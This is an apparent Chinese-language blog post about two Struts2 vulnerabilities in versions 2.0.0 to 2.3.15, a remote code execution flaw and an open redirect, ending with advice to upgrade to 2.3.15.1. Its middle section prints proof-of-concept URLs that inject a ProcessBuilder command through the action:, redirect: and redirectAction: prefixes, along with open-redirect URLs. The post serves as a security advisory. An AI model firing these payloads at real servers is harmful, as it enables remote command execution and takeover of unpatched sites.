post

Struts2 两大高危安全漏洞,网站安全再受考验

近日,Struts2 被曝出两个高危安全漏洞,影响的版本Struts 2.0.0 – Struts 2.3.15的 Struts2 全系版本,国内政府、金融、运营商及各大互联网公司的网站已受影响。

一个是使用缩写的导航参数前缀时的远程代码执行漏洞,另一个是使用缩写的重定向参数前缀时的开放式重定向漏洞。这些漏洞可使黑客取得网站服务器的“最高权限”,从而使企业服务器变成黑客手中的“肉鸡”。

Struts漏洞影响巨大,受影响站点以电商、银行、门户、政府居多,而且一些自动化、傻瓜化的利用工具开始出现,填入地址可直接执行服务器命令,读取数据甚至直接关机等操作。据乌云平台漏洞报告,淘宝、京东、腾讯等大型互联网厂商均受此影响。

了解Struts:

Struts 是Apache软件基金会(ASF)赞助的一个开源项目。它最初是Jakarta项目中的一个子项目,并在2004年3月成为ASF的顶级项目。它通过采用 JavaServlet/JSP 技术,实现了基于 Java EEWeb 应用的MVC设计模式的应用框架,是MVC经典设计模式中的一个经典产品。使用Struts的目的是为了帮助我们减少在运用MVC设计模型来开发Web应用的时间。

详细介绍下 Struts2 的两大安全漏洞:

1. 通过在参数前面加上“action:”/“redirect:”/“redirectAction:”前缀,以实现远程代码执行,如下:

[html collapse=”false”]
http://host/struts2-blank/example/X.action?action:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{‘command’,’goes’,’here’})).start()}

http://host/struts2-showcase/employee/save.action?redirect:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{‘command’,’goes’,’here’})).start()}

http://host/struts2-showcase/employee/save.action?redirectAction:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{‘command’,’goes’,’here’})).start()}
[/html]

Struts2 远程代码执行漏洞

Struts2 远程代码执行漏洞

2. 通过在参数前面加上“redirect:”/“redirectAction:”前缀,以实现开放式重定向,如下:

[html collapse=”false”]
<a href="http://host/struts2-showcase/fileupload/upload.action?redirect:http://www.yahoo.com/">http://host/struts2-showcase/fileupload/upload.action?redirect:http://www.yahoo.com/</a>

<a href="http://host/struts2-showcase/modelDriven/modelDriven.action?redirectAction:http://www.google.com/%23">http://host/struts2-showcase/modelDriven/modelDriven.action?redirectAction:http://www.google.com/%23</a>
[/html]

Struts2 开放式重定向漏洞

详细漏洞信息:

Struts2 官网:http://struts.apache.org/

为了网站和用户的安全,尽快更新到Struts 2.3.15.1安全版本吧。

主要内容来源于:CSDN

· 155 次浏览